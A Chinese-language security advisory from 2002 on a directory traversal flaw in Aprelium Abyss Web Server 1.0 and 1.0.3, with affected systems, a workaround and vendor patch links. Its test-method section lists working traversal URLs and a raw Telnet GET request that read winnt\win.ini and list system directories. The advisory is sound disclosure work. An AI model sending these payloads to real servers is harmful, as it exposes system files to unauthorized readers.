发布日期：2002-08-22
更新日期：2002-08-27

受影响系统：

Aprelium Technologies Abyss Web Server 1.0
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
Aprelium Technologies Abyss Web Server 1.0.3
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional

描述：

---

BUGTRAQ  ID: 5547

Abyss Web Server是一款由Aprelium Technologies开发和维护的Web服务器。

Abyss Web Server实现上存在输入验证漏洞，远程攻击者可以利用此漏洞进行目录遍历攻击，读取任意有权限读取的文件。

Abyss Web Server没有正确检查反斜杠'\'(编码为'%5c')，远程攻击者可能利用URL编码'%2e%2e%5c'来进行目录遍历攻击，任意系统文件可能被攻击者读取。在不同的环境，得到效果不同。

<*来源：Auriemma Luigi （aluigi@pivx.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103004438326417&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Auriemma Luigi （aluigi@pivx.com）提供了如下测试方法：

http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
"GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0" (using a Telnet client)
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt/
http://host/%2f%2e%2e%2f
http://host/%2f%2e%2e%2fcgi-bin/

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 在漏洞修补之前，暂时停止Abyss Web Server的使用。

厂商补丁：

Aprelium Technologies
---------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

Aprelium Technologies Patch abyssws.exe
http://www.aprelium.com/data/patch1033/abyssws.exe
Windows patch.Aprelium Technologies Patch abyssws
http://www.aprelium.com/data/patch1033/abyssws

浏览次数：3072
严重程度：0（网友投票）